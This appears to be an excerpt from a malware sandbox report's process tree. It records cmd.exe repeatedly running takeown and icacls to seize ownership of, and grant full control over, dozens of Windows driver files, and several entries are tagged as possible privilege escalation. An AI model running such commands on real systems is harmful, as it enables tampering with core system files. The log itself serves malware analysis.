C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit2⤵PID:5080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql40xx.sys3⤵PID:4156
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"3⤵PID:4420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit2⤵PID:4000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\qwavedrv.sys3⤵PID:3164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"3⤵PID:4472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit2⤵PID:3272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasacd.sys3⤵PID:4228
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"3⤵PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit2⤵PID:4252
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasl2tp.sys3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rasl2tp.sys /grant "Admin:F"3⤵PID:4324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit2⤵PID:4332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspppoe.sys3⤵PID:4432
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"3⤵PID:4684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit2⤵PID:4416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspptp.sys3⤵PID:4492
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\raspptp.sys /grant "Admin:F"3⤵PID:4460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit2⤵PID:3472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rassstp.sys3⤵PID:4664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rassstp.sys /grant "Admin:F"3⤵PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit2⤵PID:4328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdbss.sys3⤵PID:4504
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"3⤵PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit2⤵PID:4536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpbus.sys3⤵PID:4852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"3⤵PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit2⤵PID:4780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPCDD.sys3⤵PID:4944
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit2⤵PID:4556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpdr.sys3⤵
- Modifies file permissions
PID:4716
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"3⤵PID:4756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit2⤵PID:4892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPENCDD.sys3⤵PID:4564
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit2⤵PID:4656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPREFMP.sys3⤵PID:2560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "Admin:F"3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit2⤵PID:4912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpvideominiport.sys3⤵PID:3832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit2⤵PID:4952
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpwd.sys3⤵PID:4172
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"3⤵PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit2⤵PID:4824
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdyboost.sys3⤵PID:5104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdyboost.sys /grant "Admin:F"3⤵PID:4216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit2⤵PID:5076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rmcast.sys3⤵
- Modifies file permissions
PID:4276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit2⤵PID:4932
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RNDISMP.sys3⤵
- Possible privilege escalation attempt
PID:4292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RNDISMP.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit2⤵PID:3888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rootmdm.sys3⤵PID:4388
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"3⤵PID:4720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit2⤵PID:4156
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rspndr.sys3⤵PID:4452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rspndr.sys /grant "Admin:F"3⤵PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit2⤵PID:4408
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Rtnic64.sys3⤵PID:4732
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"3⤵PID:4304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit2⤵PID:4508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbp2port.sys3⤵
- Modifies file permissions
PID:4860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sbp2port.sys /grant "Admin:F"3⤵PID:4632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit2⤵PID:4376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scfilter.sys3⤵PID:4960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\scfilter.sys /grant "Admin:F"3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit2⤵PID:4500
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scsiport.sys3⤵PID:4316
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\scsiport.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit2⤵PID:4436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\secdrv.sys3⤵PID:4564
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\secdrv.sys /grant "Admin:F"3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit2⤵PID:4396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serenum.sys3⤵PID:4488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serenum.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit2⤵PID:4880
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serial.sys3⤵PID:4624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"3⤵PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit2⤵PID:4968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sermouse.sys3⤵PID:4688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sermouse.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit2⤵PID:4544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffdisk.sys3⤵PID:3452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffdisk.sys /grant "Admin:F"3⤵PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit2⤵PID:4844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_mmc.sys3⤵PID:1444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "Admin:F"3⤵PID:4124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit2⤵PID:5028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_sd.sys3⤵PID:4904
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffp_sd.sys /grant "Admin:F"3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit2⤵PID:5108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sfloppy.sys3⤵PID:4964
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"3⤵PID:4524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit2⤵PID:4532
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid2.sys3⤵PID:4836
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"3⤵PID:4724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit2⤵PID:4420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid4.sys3⤵PID:4528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid4.sys /grant "Admin:F"3⤵PID:4148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit2⤵PID:4280
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smb.sys3⤵
- Modifies file permissions
PID:4452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit2⤵PID:4304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smclib.sys3⤵
- Possible privilege escalation attempt
PID:4676
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smclib.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit2⤵PID:4048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spldr.sys3⤵PID:4584
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\spldr.sys /grant "Admin:F"3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit2⤵PID:4960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spsys.sys3⤵PID:3556
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\spsys.sys /grant "Admin:F"3⤵PID:4840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit2⤵PID:4632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv.sys3⤵PID:4876
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"3⤵PID:4852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit2⤵PID:4316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵PID:4944
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:4820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵PID:4344
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"3⤵PID:4836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:5100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵PID:1444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"3⤵PID:4432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:4596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵PID:5096
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storport.sys /grant "Admin:F"3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:5072
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:4028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"3⤵PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:5116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:4572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stream.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:4388
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵
- Modifies file permissions
PID:4448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\swenum.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:4472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "Admin:F"3⤵PID:4672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:4444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵PID:4704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tape.sys /grant "Admin:F"3⤵PID:4688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:4564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵
- Modifies file permissions
PID:4840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tcpip.sys /grant "Admin:F"3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:4576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵
- Modifies file permissions
PID:4904
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tcpipreg.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:4876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵PID:3856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdi.sys /grant "Admin:F"3⤵PID:5096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:4404
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:4964
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdpipe.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:4136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Possible privilege escalation attempt
PID:4264
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdtcp.sys /grant "Admin:F"3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:1444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵PID:4804
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdx.sys /grant "Admin:F"3⤵PID:4700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:3708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵PID:4736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\termdd.sys /grant "Admin:F"3⤵PID:4188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:4248
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:5032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\terminpt.sys /grant "Admin:F"3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:4208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:4672
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tssecsrv.sys /grant "Admin:F"3⤵PID:5056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:4676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:4620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:4504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵
- Modifies file permissions
PID:4164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "Admin:F"3⤵PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:4904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵
- Modifies file permissions
PID:4864
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tsusbhub.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:3856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵PID:5104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tunnel.sys /grant "Admin:F"3⤵PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:3944
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵PID:4100
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\UAGP35.SYS /grant "Admin:F"3⤵PID:4704
-
-
-
